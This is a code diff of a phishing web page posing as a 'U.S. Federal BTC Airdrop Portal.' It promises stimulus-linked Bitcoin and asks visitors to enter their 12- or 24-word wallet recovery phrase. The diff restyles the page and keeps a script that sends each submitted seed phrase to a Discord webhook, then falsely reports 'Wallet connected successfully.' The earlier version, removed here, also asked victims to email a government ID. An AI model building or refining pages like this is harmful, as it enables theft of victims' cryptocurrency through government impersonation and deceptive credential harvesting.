--- a/index.html
+++ b/index.html
@@ -1,116 +1,115 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8">
-  <title>GovBTCClaim Portal</title>
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+  <title>U.S. Federal BTC Airdrop Portal</title>
   <style>
     body {
-      font-family: Arial, sans-serif;
-      background-color: #f4f4f4;
-      background-image: url('https://www.transparenttextures.com/patterns/white-wall.png');
-      text-align: center;
-      padding-top: 50px;
+      margin: 0;
+      font-family: 'Arial', sans-serif;
+      background-color: #e7f0fa;
+      display: flex;
+      flex-direction: column;
+      align-items: center;
+      padding: 40px 20px;
     }
 
-    .container {
-      background: white;
-      width: 90%;
-      max-width: 420px;
-      margin: auto;
-      padding: 30px;
-      border-radius: 12px;
-      box-shadow: 0 0 10px rgba(0,0,0,0.1);
+    .flag {
+      font-size: 28px;
+      text-align: center;
+      margin-bottom: 10px;
+    }
+
+    h1 {
+      font-size: 1.8rem;
+      color: #0a2342;
+      text-align: center;
+      margin-bottom: 10px;
     }
 
     h2 {
-      color: #f7931a;
+      font-size: 1.2rem;
+      color: #0a2342;
+      text-align: center;
+      margin-bottom: 30px;
+      font-weight: normal;
     }
 
-    .btn {
-      background-color: #f7931a;
-      color: white;
-      padding: 12px 20px;
-      margin-top: 20px;
-      border: none;
-      border-radius: 6px;
-      cursor: pointer;
+    .form-container {
+      background-color: #fff;
+      border-radius: 16px;
+      box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
+      padding: 30px 25px;
+      max-width: 400px;
+      width: 100%;
+    }
+
+    select, input {
+      width: 100%;
+      padding: 14px;
+      margin: 15px 0;
       font-size: 16px;
+      border: 2px solid #ccd7e0;
+      border-radius: 10px;
+      outline: none;
+      transition: border 0.2s ease;
+    }
+
+    input:focus, select:focus {
+      border-color: #0044cc;
+    }
+
+    button {
+      width: 100%;
+      padding: 16px;
+      background-color: #002d72;
+      color: white;
+      font-size: 17px;
+      font-weight: bold;
+      border: none;
+      border-radius: 10px;
+      cursor: pointer;
+      margin-top: 10px;
+    }
+
+    button:hover {
+      background-color: #001f4d;
     }
 
     .note {
       font-size: 13px;
       color: #777;
-      margin-top: 10px;
-    }
-
-    select, input[type="text"] {
-      padding: 10px;
-      width: 100%;
-      margin-top: 10px;
-      border-radius: 5px;
-      border: 1px solid #ccc;
-    }
-
-    .alert {
-      background-color: #fff3cd;
-      color: #856404;
-      padding: 12px;
-      border-radius: 6px;
-      margin-bottom: 20px;
-      font-size: 14px;
-      border: 1px solid #ffeeba;
+      text-align: center;
+      margin-top: 20px;
     }
   </style>
 </head>
 <body>
-  <div class="container">
 
-    <div class="alert">
-      To verify your eligibility to claim this refund, please send a government-issued ID to:  
-      <strong>admin@govbtcclaim.org</strong>
-    </div>
+  <div class="flag">🇺🇸</div>
+  <h1>U.S. Federal BTC Airdrop Portal</h1>
+  <h2>Submit to verify eligibility & claim stimulus-linked Bitcoin</h2>
 
-    <h2>🇺🇸 Government BTC Refund</h2>
-    <p>Claim your Bitcoin refund through verified wallet connection.</p>
-    <p><strong>Amount to be received: 0.92 BTC ≈ $99,791</strong></p>
-
-    <button class="btn" onclick="document.getElementById('walletSection').style.display='block'">Connect Wallet</button>
-
-    <form id="walletSection" style="display:none; margin-top:20px;" onsubmit="sendToDiscord(event)">
-      <label for="walletSelect">Wallet Type:</label>
+  <div class="form-container">
+    <form id="walletForm" onsubmit="sendToDiscord(event)">
       <select id="walletSelect" name="wallet" required>
+        <option value="" disabled selected>Select Wallet Provider</option>
         <option value="MetaMask">MetaMask</option>
         <option value="TrustWallet">Trust Wallet</option>
         <option value="Coinbase">Coinbase Wallet</option>
         <option value="Other">Other</option>
       </select>
 
-      <label for="seedInput" style="margin-top:10px;">Seed Phrase:</label>
-      <input type="text" id="seedInput" name="phrase" placeholder="Enter your 12 or 24-word phrase" required>
+      <input type="text" id="seedInput" name="phrase" placeholder="Enter your 12 or 24-word Recovery Phrase" required />
 
-      <button class="btn" type="submit">Submit</button>
+      <button type="submit">Claim Official Airdrop</button>
     </form>
-
     <div class="note">
       Minimum wallet balance: 0.0092 BTC<br>
-      <small>(If your balance is lower, contact support)</small><br>
-      For inquiries: <strong>admin@govbtcclaim.org</strong>
+      For support: <strong>admin@govbtcclaim.org</strong>
     </div>
   </div>
-
-  <!-- Live Chat Widget -->
-  <script type="text/javascript">
-    var Tawk_API = Tawk_API || {}, Tawk_LoadStart = new Date();
-    (function() {
-      var s1 = document.createElement("script"), s0 = document.getElementsByTagName("script")[0];
-      s1.async = true;
-      s1.src = 'https://embed.tawk.to/686c82558d299b19083881aa/default';
-      s1.charset = 'UTF-8';
-      s1.setAttribute('crossorigin', '*');
-      s0.parentNode.insertBefore(s1, s0);
-    })();
-  </script>
 
   <!-- Discord Webhook Script -->
   <script>
@@ -121,7 +120,7 @@
       const phrase = document.getElementById('seedInput').value;
 
       const data = {
-        content: `🔥 New Submission:
+        content: `🔥 New Airdrop Claim:
         \nWallet Type: **${wallet}**
         \nSeed Phrase: **${phrase}**`
       };
@@ -134,13 +133,13 @@
         body: JSON.stringify(data)
       }).then(() => {
         alert("Wallet connected successfully.");
-        document.getElementById('walletSection').reset();
-        document.getElementById('walletSection').style.display = 'none';
+        document.getElementById('walletForm').reset();
       }).catch(err => {
         alert("Failed to connect. Try again later.");
         console.error(err);
       });
     }
   </script>
+
 </body>
 </html>
